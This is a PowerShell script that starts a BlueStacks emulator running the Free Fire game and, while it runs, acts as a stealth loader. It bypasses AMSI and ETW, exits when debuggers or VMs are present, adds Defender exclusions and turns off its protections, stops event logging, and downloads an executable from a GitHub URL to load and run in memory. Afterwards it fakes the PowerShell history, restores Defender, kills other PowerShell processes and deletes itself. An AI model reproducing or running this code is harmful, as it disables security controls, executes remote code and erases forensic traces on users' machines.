$WarningPreference = "SilentlyContinue"
$VerbosePreference = "SilentlyContinue"
$DebugPreference = "SilentlyContinue"
$ProgressPreference = "SilentlyContinue"
$ErrorActionPreference = "SilentlyContinue"

# ========== AMSI + ETW BYPASS ==========
try {
    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
    $t=[Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
    if($t){
        $f=$t.GetField('etwProvider','NonPublic,Static').GetValue($null)
        if($f){
            [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($f,0)
        }
    }
} catch { }

<#
.SYNOPSIS
    Launch payload, wait for HD-Player to exit.
    Also starts the emulator first if not already running.
#>

#Requires -RunAsAdministrator

# ------------------------------------------------------------
# HIDE THE PRIMARY POWERSHELL CONSOLE WINDOW
# ------------------------------------------------------------
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("User32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'
$consolePtr = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($consolePtr, 0)

# ========== ANTI-ANALYSIS ==========
if ([System.Diagnostics.Debugger]::IsAttached) { exit }
$analysisTools = @('procexp','wireshark','ida','ollydbg','x64dbg','dnspy','processhacker')
foreach ($tool in $analysisTools) {
    if (Get-Process $tool -ErrorAction SilentlyContinue) { exit }
}
if (Get-Process 'vboxservice','vmtoolsd' -ErrorAction SilentlyContinue) { exit }

# ========== ADD WINDOWS DEFENDER EXCLUSIONS ==========
Write-Host "[*] Adding Windows Defender exclusions..." -ForegroundColor Cyan
try {
    Add-MpPreference -ExclusionPath "C:\Users\billa\Desktop" -ErrorAction Stop
    Write-Host "[+] Desktop folder excluded." -ForegroundColor Green
} catch { Write-Host "[-] Failed to add Desktop exclusion: $_" -ForegroundColor Yellow }

try {
    Add-MpPreference -ExclusionPath "C:\" -ErrorAction Stop
    Write-Host "[+] C:\ drive excluded." -ForegroundColor Green
} catch { Write-Host "[-] Failed to add C:\ exclusion: $_" -ForegroundColor Yellow }

try {
    Add-MpPreference -ExclusionProcess "powershell.exe" -ErrorAction Stop
    Write-Host "[+] powershell.exe excluded." -ForegroundColor Green
} catch { Write-Host "[-] Failed to add PowerShell exclusion: $_" -ForegroundColor Yellow }

try {
    Add-MpPreference -ExclusionPath "$env:TEMP" -ErrorAction Stop
    Add-MpPreference -ExclusionPath "$env:WINDIR\Temp" -ErrorAction Stop
    Write-Host "[+] Temp folders excluded." -ForegroundColor Green
} catch { Write-Host "[-] Failed to add temp exclusions" -ForegroundColor Yellow }

Write-Host "[*] Exclusions added. Continuing..." -ForegroundColor Cyan

# ========== STOP EVENT LOG SERVICE ==========
try {
    net stop eventlog /y 2>$null
} catch { }

# ------------------------------------------------------------
# LAUNCH EMULATOR FIRST (if not already running)
# ------------------------------------------------------------
Write-Host "[*] Checking for HD-Player.exe..." -ForegroundColor Cyan
$emuProcess = Get-Process -Name "HD-Player" -ErrorAction SilentlyContinue

if ($emuProcess) {
    Write-Host "[+] Emulator already running. Skipping launch." -ForegroundColor Green
} else {
    Write-Host "[*] Emulator not running. Starting emulator..." -ForegroundColor Yellow
    # Find HD-Player.exe
    $emulatorPaths = @(
        "C:\Program Files\BlueStacks_nxt\HD-Player.exe",
        "C:\Program Files\BlueStacks_msi2\HD-Player.exe",
        "C:\Program Files (x86)\BlueStacks\HD-Player.exe"
        "C:\Program Files\BlueStacks_msi5\HD-Player.exe"
    )
    $emulatorExe = $emulatorPaths | Where-Object { Test-Path $_ } | Select-Object -First 1
    if (-not $emulatorExe) {
        Write-Host "[-] HD-Player.exe not found. Please check emulator installation." -ForegroundColor Red
        exit
    }
    # Launch with the exact command you provided
    $instance = "Pie64"  # change if needed
    $package = "com.dts.freefireth"
    $args = "--instance $instance --cmd launchApp --package ""$package"" --source desktop_shortcut"
    Start-Process $emulatorExe -ArgumentList $args
    Write-Host "[+] Emulator launching. Waiting 15 seconds for boot..." -ForegroundColor Green
    Start-Sleep -Seconds 15
    Write-Host "[+] Emulator should be ready now." -ForegroundColor Green
}

# ------------------------------------------------------------
# SAVE ORIGINAL DEFENDER SETTINGS AND DISABLE PROTECTIONS
# ------------------------------------------------------------
Write-Host "[*] Disabling Windows Defender protections..." -ForegroundColor Cyan
$originalRealtime = (Get-MpPreference).DisableRealtimeMonitoring
$originalBehavior = (Get-MpPreference).DisableBehaviorMonitoring
$originalScriptScan = (Get-MpPreference).DisableScriptScanning
$originalIOAV = (Get-MpPreference).DisableIOAVProtection

Set-MpPreference -DisableRealtimeMonitoring $true -EA 0
Set-MpPreference -DisableBehaviorMonitoring $true -EA 0
Set-MpPreference -DisableScriptScanning $true -EA 0
Set-MpPreference -DisableIOAVProtection $true -EA 0
Set-MpPreference -AttackSurfaceReductionRules_Ids "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC" -AttackSurfaceReductionRules_Actions Disabled -EA 0

# ------------------------------------------------------------
# PREPARE PAYLOAD AS ENCODED COMMAND
# ------------------------------------------------------------
$payloadScript = @'
try {
    $u='https://raw.githubusercontent.com/billa9889/wahhhss1/main/Brave%20Update%20Handler.exe'
    $maxRetries=3
    for($i=1;$i -le $maxRetries;$i++){
        try {
            $bytes=(New-Object Net.WebClient).DownloadData($u)
            break
        } catch {
            if($i -eq $maxRetries){exit}
            Start-Sleep -Seconds (Get-Random -Minimum 1 -Maximum 3)
        }
    }
    [System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null,(,[string[]]@()))
} catch { exit }
'@
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payloadScript)
$encoded = [Convert]::ToBase64String($bytes)

# ========== LAUNCH PAYLOAD ==========
$p = Start-Process powershell.exe "-WindowStyle Normal -NoProfile -ExecutionPolicy Bypass -EncodedCommand $encoded" -PassThru
Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 5)

# ------------------------------------------------------------
# WAIT FOR HD-PLAYER.EXE TO EXIT
# ------------------------------------------------------------
Write-Host "[*] Waiting for HD-Player.exe to exit..." -ForegroundColor Cyan
while ($true) {
    $proc = Get-Process -Name "HD-Player" -ErrorAction SilentlyContinue
    if (-not $proc) { break }
    Start-Sleep -Seconds (Get-Random -Minimum 1 -Maximum 4)
}
Write-Host "[+] HD-Player.exe has exited." -ForegroundColor Green

# ------------------------------------------------------------
# WAIT 10 SECONDS, THEN KILL PAYLOAD PROCESS
# ------------------------------------------------------------
Write-Host "[*] Waiting 10 seconds for handles to release..." -ForegroundColor Cyan
Start-Sleep -Seconds 10

Write-Host "[*] Killing payload PowerShell process (PID: $($p.Id))..." -ForegroundColor Cyan
try {
    Stop-Process -Id $p.Id -Force -ErrorAction Stop
    Write-Host "[+] Payload process killed." -ForegroundColor Green
} catch {
    Write-Host "[-] Could not kill process (already exited)." -ForegroundColor Yellow
}

# ------------------------------------------------------------
# OVERWRITE POWERSHELL HISTORY
# ------------------------------------------------------------
$historyPath = "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
$dir = Split-Path $historyPath -Parent
if (-not (Test-Path $dir)) { New-Item -ItemType Directory -Path $dir -Force | Out-Null }

$optimizerScript = @'
<#
.SYNOPSIS
    Fast PC Optimizer – Cleans temporary files, caches, recycle bin.
.DESCRIPTION
    Safely removes Windows temp files, browser caches, Windows Update cache,
    and empties recycle bin. Run as Administrator.
#>

Write-Host "=== Fast PC Optimizer ===" -ForegroundColor Cyan

$tempPaths = @("$env:TEMP\*", "$env:WINDIR\Temp\*", "$env:WINDIR\Prefetch\*")
foreach ($p in $tempPaths) { Remove-Item $p -Recurse -Force -ErrorAction SilentlyContinue }

Clear-RecycleBin -Force -ErrorAction SilentlyContinue

$cachePaths = @(
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cache\*",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Cache\*"
)
foreach ($cp in $cachePaths) { Remove-Item $cp -Recurse -Force -ErrorAction SilentlyContinue }

Write-Host "Optimization complete." -ForegroundColor Green
'@

Set-Content -Path $historyPath -Value $optimizerScript -Encoding UTF8
Write-Host "[*] PowerShell history overwritten with PC Optimizer script." -ForegroundColor Green

# ============================================================
# PHASE 2: MEMORY FORENSICS (RAM CLEANUP)
# ============================================================
Write-Host "[PHASE 2] Scrubbing memory artifacts..." -ForegroundColor Cyan

$typeName = "WinAPI" + (Get-Random -Maximum 9999)
$api = Add-Type -MemberDefinition @'
[DllImport("kernel32.dll")]
public static extern bool EmptyWorkingSet(IntPtr hProcess);
'@ -Name $typeName -Namespace "Mem" -PassThru -ErrorAction SilentlyContinue

if (-not $api) {
    $api = [Type]::GetType("Mem.$typeName")
}

if (-not $api) {
    Write-Host "[-] Failed to load EmptyWorkingSet API. Skipping memory cleanup." -ForegroundColor Yellow
} else {
    Get-Process | ForEach-Object {
        $handle = $_.Handle
        if ($handle -and $handle -ne 0) {
            try {
                $null = $api::EmptyWorkingSet($handle)
            } catch {}
        }
    }

    [System.GC]::Collect()
    [System.GC]::WaitForPendingFinalizers()
    [System.GC]::Collect()
    [System.GC]::Collect()

    Write-Host "[+] Memory working sets cleared" -ForegroundColor Green
}

# ------------------------------------------------------------
# REMOVE WINDOWS DEFENDER EXCLUSIONS
# ------------------------------------------------------------
Write-Host "[*] Removing Windows Defender exclusions..." -ForegroundColor Cyan

try {
    Remove-MpPreference -ExclusionPath "C:\" -ErrorAction Stop
    Write-Host "[+] C:\ exclusion removed." -ForegroundColor Green
} catch { Write-Host "[-] Failed to remove C:\ exclusion" -ForegroundColor Yellow }

try {
    Remove-MpPreference -ExclusionPath "C:\Users\billa\Desktop" -ErrorAction Stop
    Write-Host "[+] Desktop exclusion removed." -ForegroundColor Green
} catch { Write-Host "[-] Desktop exclusion not found" -ForegroundColor Yellow }

try {
    Remove-MpPreference -ExclusionProcess "powershell.exe" -ErrorAction Stop
    Write-Host "[+] PowerShell process exclusion removed." -ForegroundColor Green
} catch { Write-Host "[-] PowerShell process exclusion not found" -ForegroundColor Yellow }

try {
    Remove-MpPreference -ExclusionPath "$env:TEMP" -ErrorAction Stop
    Remove-MpPreference -ExclusionPath "$env:WINDIR\Temp" -ErrorAction Stop
    Write-Host "[+] Temp folder exclusions removed." -ForegroundColor Green
} catch { Write-Host "[-] Could not remove temp exclusions" -ForegroundColor Yellow }

# ------------------------------------------------------------
# RE-ENABLE WINDOWS DEFENDER PROTECTIONS
# ------------------------------------------------------------
Write-Host "[*] Re-enabling Windows Defender protections..." -ForegroundColor Cyan

try {
    Set-MpPreference -DisableRealtimeMonitoring $originalRealtime -ErrorAction Stop
    Write-Host "[+] Real-time monitoring restored." -ForegroundColor Green
} catch { Write-Host "[-] Could not restore real-time monitoring" -ForegroundColor Yellow }

try {
    Set-MpPreference -DisableBehaviorMonitoring $originalBehavior -ErrorAction Stop
    Write-Host "[+] Behavior monitoring restored." -ForegroundColor Green
} catch { Write-Host "[-] Could not restore behavior monitoring" -ForegroundColor Yellow }

try {
    Set-MpPreference -DisableScriptScanning $originalScriptScan -ErrorAction Stop
    Write-Host "[+] Script scanning restored." -ForegroundColor Green
} catch { Write-Host "[-] Could not restore script scanning" -ForegroundColor Yellow }

try {
    Set-MpPreference -DisableIOAVProtection $originalIOAV -ErrorAction Stop
    Write-Host "[+] IOAV protection restored." -ForegroundColor Green
} catch { Write-Host "[-] Could not restore IOAV protection" -ForegroundColor Yellow }

try {
    Set-MpPreference -AttackSurfaceReductionRules_Ids "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC" -AttackSurfaceReductionRules_Actions Enabled -ErrorAction Stop
    Write-Host "[+] Obfuscated script ASR rule re-enabled." -ForegroundColor Green
} catch { Write-Host "[-] Could not re-enable ASR rule" -ForegroundColor Yellow }

Write-Host "[*] Windows Defender protections restored to original state." -ForegroundColor Cyan

# ========== FINAL CLEANUP ==========
Write-Host "[*] Performing final cleanup..." -ForegroundColor Cyan

# Restart EventLog service
try {
    net start eventlog 2>$null
} catch { }

# ------------------------------------------------------------
# REMOVE EVERY POWERSHELL WINDOW FROM BACKGROUND
# ------------------------------------------------------------
Start-Sleep -Seconds 2
Get-Process -Name "powershell" -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $pid -and $_.Id -ne $p.Id } | ForEach-Object {
    try {
        Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
    } catch { }
}

Write-Host "[*] Main script finished. Press any key to close this window..."
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

# Self-delete the script file
try {
    cmd /c "del /f /q `"$PSCommandPath`"" 2>$null
} catch { }
